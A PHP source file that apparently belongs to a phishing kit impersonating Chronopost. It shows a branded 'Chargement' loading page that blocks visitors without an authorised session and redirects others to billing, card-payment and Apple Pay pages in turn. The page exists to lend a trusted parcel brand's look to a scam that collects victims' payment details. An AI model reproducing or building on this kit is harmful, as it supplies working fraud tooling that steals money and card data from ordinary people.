<?php 
session_start();

if($_SESSION['authorized'] == "1")
{




	if($_GET['goto'] == "explain")
	{
		header('Refresh: 2; url=explain.php?'.$_SESSION['userid']);
	}
	else{
      if($_GET['goto'] == "billing")
      {
    header('Refresh: 2; url=billing.php?'.$_SESSION['userid']);
     }
      else{
        if($_GET['goto'] == "card")
      {
    header('Refresh: 2; url=paiement.php?'.$_SESSION['userid']);
     }
     else{
      if($_GET['goto'] == "finished")
      {
    header('Refresh: 2; url=finished.php?'.$_SESSION['userid']);
     }
	else{
    if($_GET['goto'] == "applepay")
      {
	header('Refresh: 20; url=apple_pay.php?'.$_SESSION['userid']);
    }
}
	
     }
      }
	}


?>

   <html>



<head>
  <title>Chargement | Chronopost</title>
      <meta name="viewport" content="width=device-width"/>
  </head>
  <body>
   <center> <img style="width: 150px; margin-top: 250px; margin-right: 15px;" src="https://upload.wikimedia.org/wikipedia/fr/archive/f/f9/20181201224334%21Chronopost_logo_2015.png"></center>
    <center>

      <div style="margin-top: 50px;" class="loadingio-spinner-rolling-1foafbztm83"><div class="ldio-kwlss8n4oxj">
<div></div>
</div></div></center>
<style type="text/css">
@keyframes ldio-kwlss8n4oxj {
  0% { transform: translate(-50%,-50%) rotate(0deg); }
  100% { transform: translate(-50%,-50%) rotate(360deg); }
}
.ldio-kwlss8n4oxj div {
  position: absolute;
  width: 60px;
  height: 60px;
  border: 10px solid #1E90FF;
  border-top-color: transparent;
  border-radius: 50%;
}
.ldio-kwlss8n4oxj div {
  animation: ldio-kwlss8n4oxj 1s linear infinite;
  top: 50px;
  left: 50px
}
.loadingio-spinner-rolling-1foafbztm83 {
  width: 60px;
  height: 60px;
  display: inline-block;
  overflow: hidden;
  background: #ffffff;
}
.ldio-kwlss8n4oxj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(0.6);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-kwlss8n4oxj div { box-sizing: content-box; }
/* generated by https://loading.io/ */
</style>

  </body>

</html>


<?php 

}
else{
	die('UNAUTHORIZED IP ADRESS');
}


?>